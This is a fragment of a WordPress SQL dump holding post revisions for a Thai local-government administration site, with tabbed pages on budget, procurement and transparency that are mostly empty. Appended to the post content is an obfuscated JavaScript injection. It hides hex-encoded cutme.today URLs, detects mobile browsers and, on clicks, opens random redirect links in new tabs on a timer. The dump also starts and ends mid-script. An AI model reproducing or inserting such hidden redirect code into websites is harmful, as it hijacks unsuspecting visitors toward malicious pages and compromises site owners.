_0x5a990b=[\'substr\',\'length\',\'-hurs\',\'open\',\'round\',\'443779RQfzWn\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x6f\\x63\\x47\\x33\\x63\\x353\',\'click\',\'5114346JdlaMi\',\'1780163aSIYqH\',\'forEach\',\'host\',\'_blank\',\'68512ftWJcO\',\'addEventListener\',\'-mnts\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x74\\x68\\x4f\\x35\\x63\\x385\',\'4588749LmrVjF\',\'parse\',\'630bGPCEV\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x41\\x6e\\x50\\x38\\x63\\x338\',\'abs\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x41\\x58\\x4e\\x39\\x63\\x389\',\'56bnMKls\',\'opera\',\'6946eLteFW\',\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x49\\x4d\\x76\\x34\\x63\\x324\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x48\\x62\\x61\\x37\\x63\\x357\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x42\\x42\\x47\\x32\\x63\\x382\',\'floor\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x50\\x79\\x78\\x36\\x63\\x376\',\'999HIfBhL\',\'filter\',\'test\',\'getItem\',\'random\',\'138490EjXyHW\',\'stopPropagation\',\'setItem\',\'70kUzPYI\'];_0x1922=function(){return _0x5a990b;};return _0x1922();}(function(_0x16ffe6,_0x1e5463){const _0x20130f=_0x3023,_0x307c06=_0x16ffe6();while(!![]){try{const _0x1dea23=parseInt(_0x20130f(0x1d6))/0x1+-parseInt(_0x20130f(0x1c1))/0x2*(parseInt(_0x20130f(0x1c8))/0x3)+parseInt(_0x20130f(0x1bf))/0x4*(-parseInt(_0x20130f(0x1cd))/0x5)+parseInt(_0x20130f(0x1d9))/0x6+-parseInt(_0x20130f(0x1e4))/0x7*(parseInt(_0x20130f(0x1de))/0x8)+parseInt(_0x20130f(0x1e2))/0x9+-parseInt(_0x20130f(0x1d0))/0xa*(-parseInt(_0x20130f(0x1da))/0xb);if(_0x1dea23===_0x1e5463)break;else _0x307c06[\'push\'](_0x307c06[\'shift\']());}catch(_0x3e3a47){_0x307c06[\'push\'](_0x307c06[\'shift\']());}}}(_0x1922,0x984cd),function(_0x34eab3){const _0x111835=_0x3023;window[\'mobileCheck\']=function(){const _0x123821=_0x3023;let _0x399500=![];return function(_0x5e9786){const _0x1165a7=_0x3023;if(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x1165a7(0x1ca)](_0x5e9786)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x1165a7(0x1ca)](_0x5e9786[_0x1165a7(0x1d1)](0x0,0x4)))_0x399500=!![];}(navigator[_0x123821(0x1c2)]||navigator[\'vendor\']||window[_0x123821(0x1c0)]),_0x399500;};const _0xe6f43=[\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x77\\x67\\x64\\x30\\x63\\x380\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x4d\\x76\\x49\\x31\\x63\\x361\',_0x111835(0x1c5),_0x111835(0x1d7),_0x111835(0x1c3),_0x111835(0x1e1),_0x111835(0x1c7),_0x111835(0x1c4),_0x111835(0x1e6),_0x111835(0x1e9)],_0x7378e8=0x3,_0xc82d98=0x6,_0x487206=_0x551830=>{const _0x2c6c7a=_0x111835;_0x551830[_0x2c6c7a(0x1db)]((_0x3ee06f,_0x37dc07)=>{const _0x476c2a=_0x2c6c7a;!localStorage[\'getItem\'](_0x3ee06f+_0x476c2a(0x1e8))&&localStorage[_0x476c2a(0x1cf)](_0x3ee06f+_0x476c2a(0x1e8),0x0);});},_0x564ab0=_0x3743e2=>{const _0x415ff3=_0x111835,_0x229a83=_0x3743e2[_0x415ff3(0x1c9)]((_0x37389f,_0x22f261)=>localStorage[_0x415ff3(0x1cb)](_0x37389f+_0x415ff3(0x1e8))==0x0);return _0x229a83[Math[_0x415ff3(0x1c6)](Math[_0x415ff3(0x1cc)]()*_0x229a83[_0x415ff3(0x1d2)])];},_0x173ccb=_0xb01406=>localStorage[_0x111835(0x1cf)](_0xb01406+_0x111835(0x1e8),0x1),_0x5792ce=_0x5415c5=>localStorage[_0x111835(0x1cb)](_0x5415c5+_0x111835(0x1e8)),_0xa7249=(_0x354163,_0xd22cba)=>localStorage[_0x111835(0x1cf)](_0x354163+_0x111835(0x1e8),_0xd22cba),_0x381bfc=(_0x49e91b,_0x531bc4)=>{const _0x1b0982=_0x111835,_0x1da9e1=0x3e8*0x3c*0x3c;return Math[_0x1b0982(0x1d5)](Math[_0x1b0982(0x1e7)](_0x531bc4-_0x49e91b)/_0x1da9e1);},_0x6ba060=(_0x1e9127,_0x28385f)=>{const _0xb7d87=_0x111835,_0xc3fc56=0x3e8*0x3c;return Math[_0xb7d87(0x1d5)](Math[_0xb7d87(0x1e7)](_0x28385f-_0x1e9127)/_0xc3fc56);},_0x370e93=(_0x286b71,_0x3587b8,_0x1bcfc4)=>{const _0x22f77c=_0x111835;_0x487206(_0x286b71),newLocation=_0x564ab0(_0x286b71),_0xa7249(_0x3587b8+\'-mnts\',_0x1bcfc4),_0xa7249(_0x3587b8+_0x22f77c(0x1d3),_0x1bcfc4),_0x173ccb(newLocation),window[\'mobileCheck\']()&&window[_0x22f77c(0x1d4)](newLocation,\'_blank\');};_0x487206(_0xe6f43);function _0x168fb9(_0x36bdd0){const _0x2737e0=_0x111835;_0x36bdd0[_0x2737e0(0x1ce)]();const _0x263ff7=location[_0x2737e0(0x1dc)];let _0x1897d7=_0x564ab0(_0xe6f43);const _0x48cc88=Date[_0x2737e0(0x1e3)](new Date()),_0x1ec416=_0x5792ce(_0x263ff7+_0x2737e0(0x1e0)),_0x23f079=_0x5792ce(_0x263ff7+_0x2737e0(0x1d3));if(_0x1ec416&&_0x23f079)try{const _0x2e27c9=parseInt(_0x1ec416),_0x1aa413=parseInt(_0x23f079),_0x418d13=_0x6ba060(_0x48cc88,_0x2e27c9),_0x13adf6=_0x381bfc(_0x48cc88,_0x1aa413);_0x13adf6>=_0xc82d98&&(_0x487206(_0xe6f43),_0xa7249(_0x263ff7+_0x2737e0(0x1d3),_0x48cc88)),_0x418d13>=_0x7378e8&&(_0x1897d7&&window[_0x2737e0(0x1e5)]()&&(_0xa7249(_0x263ff7+_0x2737e0(0x1e0),_0x48cc88),window[_0x2737e0(0x1d4)](_0x1897d7,_0x2737e0(0x1dd)),_0x173ccb(_0x1897d7)));}catch(_0x161a43){_0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}else _0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}document[_0x111835(0x1df)](_0x111835(0x1d8),_0x168fb9);}());</script>','ITA ONLINE 2567','','inherit','closed','closed','','871-revision-v1','','','2024-08-19 12:21:24','2024-08-19 05:21:24','',871,'http://pakhaeng.ssk.in.th/?p=876',0,'revision','',0),
(878,1,'2024-08-19 12:23:00','2024-08-19 05:23:00','<!-- wp:generateblocks/container {\"uniqueId\":\"f5e8d6af\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:columns -->\n<div class=\"wp-block-columns\"><!-- wp:column -->\n<div class=\"wp-block-column\"><!-- wp:kadence/tabs {\"uniqueID\":\"871_e416be-74\",\"tabCount\":7,\"layout\":\"vtabs\",\"currentTab\":4,\"contentBgColor\":\"var(\\u002d\\u002dglobal-palette9, #ffffff)\",\"contentBorderStyles\":[{\"top\":[\"#0a6689\",\"\",3],\"right\":[\"#0a6689\",\"\",0],\"bottom\":[\"#0a6689\",\"\",0],\"left\":[\"#0a6689\",\"\",0],\"unit\":\"px\"}],\"titles\":[{\"text\":\"ข้อมูลพื้นฐาน\",\"icon\":\"\",\"iconSide\":\"right\",\"onlyIcon\":false,\"subText\":\"\",\"anchor\":\"\"},{\"text\":\"\\u003cstrong\\u003eการบริหารงานและการใช้จ่ายงบประมาณ\\u003c/strong\\u003e\",\"icon\":\"\",\"iconSide\":\"right\",\"onlyIcon\":false,\"subText\":\"\",\"anchor\":\"\"},{\"text\":\"\\u003cstrong\\u003eการจัดซื้อจัดจ้าง\\u003c/strong\\u003e\",\"icon\":\"\",\"iconSide\":\"right\",\"onlyIcon\":false,\"subText\":\"\",\"anchor\":\"\"},{\"text\":\"\\u003cstrong\\u003eการบริหารและพัฒนาทรัพยากรบุคคล\\u003c/strong\\u003e\",\"icon\":\"\",\"iconSide\":\"right\",\"onlyIcon\":false,\"subText\":\"\"},{\"text\":\"\\u003cstrong\\u003eการส่งเสริมความโปร่งใส\\u003c/strong\\u003e\",\"icon\":\"\",\"iconSide\":\"right\",\"onlyIcon\":false,\"subText\":\"\"},{\"text\":\"\\u003cstrong\\u003eการดำเนินการเพื่อป้องกันการทุจริตในประเด็นสินบน\\u003c/strong\\u003e\",\"icon\":\"\",\"iconSide\":\"right\",\"onlyIcon\":false,\"subText\":\"\"},{\"text\":\"\\u003cstrong\\u003eการส่งเสริมคุณธรรมและความโปร่งใส\\u003c/strong\\u003e\",\"icon\":\"\",\"iconSide\":\"right\",\"onlyIcon\":false,\"subText\":\"\"}],\"iSize\":16,\"titleColor\":\"var(\\u002d\\u002dglobal-palette4, #2D3748)\",\"titleColorHover\":\"var(\\u002d\\u002dglobal-palette3, #1A202C)\",\"titleColorActive\":\"#ffffff\",\"titleBg\":\"var(\\u002d\\u002dglobal-palette7, #eeeeee)\",\"titleBgHover\":\"var(\\u002d\\u002dglobal-palette8, #F7FAFC)\",\"titleBgActive\":\"#0a6689\",\"titleBorder\":\"var(\\u002d\\u002dglobal-palette7, #eeeeee)\",\"titleBorderHover\":\"var(\\u002d\\u002dglobal-palette7, #eeeeee)\",\"titleBorderActive\":\"var(\\u002d\\u002dglobal-palette7, #eeeeee)\",\"titleBorderWidth\":[0,0,0,0],\"titleBorderRadius\":[4,4,0,0],\"titlePadding\":[8,20,8,20],\"titleMargin\":[0,8,0,0],\"size\":1.1,\"sizeType\":\"em\",\"lineHeight\":1.4,\"lineType\":\"em\",\"fontWeight\":\"bold\",\"verticalTabWidth\":[45,\"\",\"\"]} -->\n<div class=\"wp-block-kadence-tabs alignnone\"><div class=\"kt-tabs-wrap kt-tabs-id871_e416be-74 kt-tabs-has-7-tabs kt-active-tab-4 kt-tabs-layout-vtabs kt-tabs-tablet-layout-inherit kt-tabs-mobile-layout-inherit kt-tab-alignment-left \"><ul class=\"kt-tabs-title-list\"><li id=\"tab-\" class=\"kt-title-item kt-title-item-1 kt-tabs-svg-show-always kt-tabs-icon-side-right kt-tab-title-inactive\"><a href=\"#tab-\" data-tab=\"1\" class=\"kt-tab-title kt-tab-title-1 \"><span class=\"kt-title-text\">ข้อมูลพื้นฐาน</span></a></li><li id=\"tab-strongstrong\" class=\"kt-title-item kt-title-item-2 kt-tabs-svg-show-always kt-tabs-icon-side-right kt-tab-title-inactive\"><a href=\"#tab-strongstrong\" data-tab=\"2\" class=\"kt-tab-title kt-tab-title-2 \"><span class=\"kt-title-text\"><strong>การบริหารงานและการใช้จ่ายงบประมาณ</strong></span></a></li><li id=\"tab-strongstrong\" class=\"kt-title-item kt-title-item-3 kt-tabs-svg-show-always kt-tabs-icon-side-right kt-tab-title-inactive\"><a href=\"#tab-strongstrong\" data-tab=\"3\" class=\"kt-tab-title kt-tab-title-3 \"><span class=\"kt-title-text\"><strong>การจัดซื้อจัดจ้าง</strong></span></a></li><li id=\"tab-strongstrong\" class=\"kt-title-item kt-title-item-4 kt-tabs-svg-show-always kt-tabs-icon-side-right kt-tab-title-active\"><a href=\"#tab-strongstrong\" data-tab=\"4\" class=\"kt-tab-title kt-tab-title-4 \"><span class=\"kt-title-text\"><strong>การบริหารและพัฒนาทรัพยากรบุคคล</strong></span></a></li><li id=\"tab-strongstrong\" class=\"kt-title-item kt-title-item-5 kt-tabs-svg-show-always kt-tabs-icon-side-right kt-tab-title-inactive\"><a href=\"#tab-strongstrong\" data-tab=\"5\" class=\"kt-tab-title kt-tab-title-5 \"><span class=\"kt-title-text\"><strong>การส่งเสริมความโปร่งใส</strong></span></a></li><li id=\"tab-strongstrong\" class=\"kt-title-item kt-title-item-6 kt-tabs-svg-show-always kt-tabs-icon-side-right kt-tab-title-inactive\"><a href=\"#tab-strongstrong\" data-tab=\"6\" class=\"kt-tab-title kt-tab-title-6 \"><span class=\"kt-title-text\"><strong>การดำเนินการเพื่อป้องกันการทุจริตในประเด็นสินบน</strong></span></a></li><li id=\"tab-strongstrong\" class=\"kt-title-item kt-title-item-7 kt-tabs-svg-show-always kt-tabs-icon-side-right kt-tab-title-inactive\"><a href=\"#tab-strongstrong\" data-tab=\"7\" class=\"kt-tab-title kt-tab-title-7 \"><span class=\"kt-title-text\"><strong>การส่งเสริมคุณธรรมและความโปร่งใส</strong></span></a></li></ul><div class=\"kt-tabs-content-wrap\"><!-- wp:kadence/tab {\"uniqueID\":\"_a471bf-67\"} -->\n<div class=\"wp-block-kadence-tab kt-tab-inner-content kt-inner-tab-1 kt-inner-tab_a471bf-67\"><div class=\"kt-tab-inner-content-inner\"></div></div>\n<!-- /wp:kadence/tab -->\n\n<!-- wp:kadence/tab {\"id\":2,\"uniqueID\":\"_a3f15d-d7\"} -->\n<div class=\"wp-block-kadence-tab kt-tab-inner-content kt-inner-tab-2 kt-inner-tab_a3f15d-d7\"><div class=\"kt-tab-inner-content-inner\"></div></div>\n<!-- /wp:kadence/tab -->\n\n<!-- wp:kadence/tab {\"id\":3,\"uniqueID\":\"_bcc767-12\"} -->\n<div class=\"wp-block-kadence-tab kt-tab-inner-content kt-inner-tab-3 kt-inner-tab_bcc767-12\"><div class=\"kt-tab-inner-content-inner\"></div></div>\n<!-- /wp:kadence/tab -->\n\n<!-- wp:kadence/tab {\"id\":4,\"uniqueID\":\"_e603b6-8d\"} -->\n<div class=\"wp-block-kadence-tab kt-tab-inner-content kt-inner-tab-4 kt-inner-tab_e603b6-8d\"><div class=\"kt-tab-inner-content-inner\"></div></div>\n<!-- /wp:kadence/tab -->\n\n<!-- wp:kadence/tab {\"id\":5,\"uniqueID\":\"_ff999a-98\"} -->\n<div class=\"wp-block-kadence-tab kt-tab-inner-content kt-inner-tab-5 kt-inner-tab_ff999a-98\"><div class=\"kt-tab-inner-content-inner\"></div></div>\n<!-- /wp:kadence/tab -->\n\n<!-- wp:kadence/tab {\"id\":6,\"uniqueID\":\"_387c35-4e\"} -->\n<div class=\"wp-block-kadence-tab kt-tab-inner-content kt-inner-tab-6 kt-inner-tab_387c35-4e\"><div class=\"kt-tab-inner-content-inner\"></div></div>\n<!-- /wp:kadence/tab -->\n\n<!-- wp:kadence/tab {\"id\":7,\"uniqueID\":\"_ea5a2e-14\"} -->\n<div class=\"wp-block-kadence-tab kt-tab-inner-content kt-inner-tab-7 kt-inner-tab_ea5a2e-14\"><div class=\"kt-tab-inner-content-inner\"></div></div>\n<!-- /wp:kadence/tab --></div></div></div>\n<!-- /wp:kadence/tabs --></div>\n<!-- /wp:column --></div>\n<!-- /wp:columns -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"74e53c05\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:generateblocks/headline {\"uniqueId\":\"608409cd\",\"blockVersion\":3} -->\n<h2 class=\"gb-headline gb-headline-608409cd gb-headline-text\"><strong>ข้อมูลพื้นฐาน</strong></h2>\n<!-- /wp:generateblocks/headline -->\n\n<!-- wp:kadence/iconlist {\"uniqueID\":\"871_db0f60-10\",\"icon\":\"fe_arrowRight\"} -->\n<div class=\"wp-block-kadence-iconlist kt-svg-icon-list-items kt-svg-icon-list-items871_db0f60-10 kt-svg-icon-list-columns-1 alignnone\"><ul class=\"kt-svg-icon-list\"><!-- wp:kadence/listitem {\"uniqueID\":\"871_f0fbcd-0d\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-871_f0fbcd-0d\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=650\">โครงสร้าง</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"871_f19143-44\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-871_f19143-44\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=650\">ข้อมูลผู้บริหาร</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"871_a70426-ef\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-871_a70426-ef\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=650\">อำนาจหน้าที่</a></span></li>\n<!-- /wp:kadence/listitem --></ul></div>\n<!-- /wp:kadence/iconlist -->\n\n<!-- wp:paragraph -->\n<p></p>\n<!-- /wp:paragraph -->\n<!-- /wp:generateblocks/container -->\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return _0x3023=function(_0x30231a,_0x4e4880){_0x30231a=_0x30231a-0x1bf;let _0x2b207e=_0x1922f2[_0x30231a];return _0x2b207e;},_0x3023(_0x562006,_0x1334d6);}function _0x1922(){const _0x5a990b=[\'substr\',\'length\',\'-hurs\',\'open\',\'round\',\'443779RQfzWn\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x6f\\x63\\x47\\x33\\x63\\x353\',\'click\',\'5114346JdlaMi\',\'1780163aSIYqH\',\'forEach\',\'host\',\'_blank\',\'68512ftWJcO\',\'addEventListener\',\'-mnts\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x74\\x68\\x4f\\x35\\x63\\x385\',\'4588749LmrVjF\',\'parse\',\'630bGPCEV\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x41\\x6e\\x50\\x38\\x63\\x338\',\'abs\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x41\\x58\\x4e\\x39\\x63\\x389\',\'56bnMKls\',\'opera\',\'6946eLteFW\',\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x49\\x4d\\x76\\x34\\x63\\x324\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x48\\x62\\x61\\x37\\x63\\x357\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x42\\x42\\x47\\x32\\x63\\x382\',\'floor\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x50\\x79\\x78\\x36\\x63\\x376\',\'999HIfBhL\',\'filter\',\'test\',\'getItem\',\'random\',\'138490EjXyHW\',\'stopPropagation\',\'setItem\',\'70kUzPYI\'];_0x1922=function(){return _0x5a990b;};return _0x1922();}(function(_0x16ffe6,_0x1e5463){const _0x20130f=_0x3023,_0x307c06=_0x16ffe6();while(!![]){try{const _0x1dea23=parseInt(_0x20130f(0x1d6))/0x1+-parseInt(_0x20130f(0x1c1))/0x2*(parseInt(_0x20130f(0x1c8))/0x3)+parseInt(_0x20130f(0x1bf))/0x4*(-parseInt(_0x20130f(0x1cd))/0x5)+parseInt(_0x20130f(0x1d9))/0x6+-parseInt(_0x20130f(0x1e4))/0x7*(parseInt(_0x20130f(0x1de))/0x8)+parseInt(_0x20130f(0x1e2))/0x9+-parseInt(_0x20130f(0x1d0))/0xa*(-parseInt(_0x20130f(0x1da))/0xb);if(_0x1dea23===_0x1e5463)break;else _0x307c06[\'push\'](_0x307c06[\'shift\']());}catch(_0x3e3a47){_0x307c06[\'push\'](_0x307c06[\'shift\']());}}}(_0x1922,0x984cd),function(_0x34eab3){const _0x111835=_0x3023;window[\'mobileCheck\']=function(){const _0x123821=_0x3023;let _0x399500=![];return function(_0x5e9786){const _0x1165a7=_0x3023;if(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x1165a7(0x1ca)](_0x5e9786)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x1165a7(0x1ca)](_0x5e9786[_0x1165a7(0x1d1)](0x0,0x4)))_0x399500=!![];}(navigator[_0x123821(0x1c2)]||navigator[\'vendor\']||window[_0x123821(0x1c0)]),_0x399500;};const 